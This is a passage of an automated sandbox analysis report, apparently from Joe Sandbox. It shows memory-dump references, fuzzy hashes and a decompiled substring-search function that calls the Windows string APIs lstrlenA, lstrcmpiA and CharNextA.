                                                      • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc
                                                      • String ID:
                                                      • API String ID: 1780285237-0
                                                      • Opcode ID: f8eaf36f466c60d9859b0a8dd8160b02c17f79b8b7a2f9b7a39cc743f041c6b4
                                                      • Instruction ID: c47355b2851a1ac191e3fa54c06ca742ee90832e53898123df1b6db0e8fbf6c6
                                                      • Opcode Fuzzy Hash: f8eaf36f466c60d9859b0a8dd8160b02c17f79b8b7a2f9b7a39cc743f041c6b4
                                                      • Instruction Fuzzy Hash: 1931CFF2504204BFD711AF69DD7DB6E7FFAEB05240BB40219EA46CA3A0D6789940CB24
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405A7B Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00405A7B(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                      0x00405a8b
                                                      0x00405a8d
                                                      0x00405a90
                                                      0x00405abc
                                                      0x00405a95
                                                      0x00405a9e
                                                      0x00405aa3
                                                      0x00405aae
                                                      0x00405ab1
                                                      0x00405acd
                                                      0x00405ab3
                                                      0x00405aba
                                                      0x00000000
                                                      0x00405aba
                                                      0x00405ac6
                                                      0x00405aca
                                                      0x00405aca
                                                      0x00405ac4
                                                      0x00000000

                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CD6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A8B
                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AA3
                                                      • CharNextA.USER32(00000000,?,00000000,00405CD6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AB4
                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405CD6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ABD
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                      • Instruction ID: bbf0fe82adfec40a5435aad4fbaff8462ffeb4f6e62521b4b159965ff53dba99
                                                      • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                      • Instruction Fuzzy Hash: 9BF0C232215914BFC702DBA8CD40D9EBBA8EF46350B2540B9E840F7211D634DE019FA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%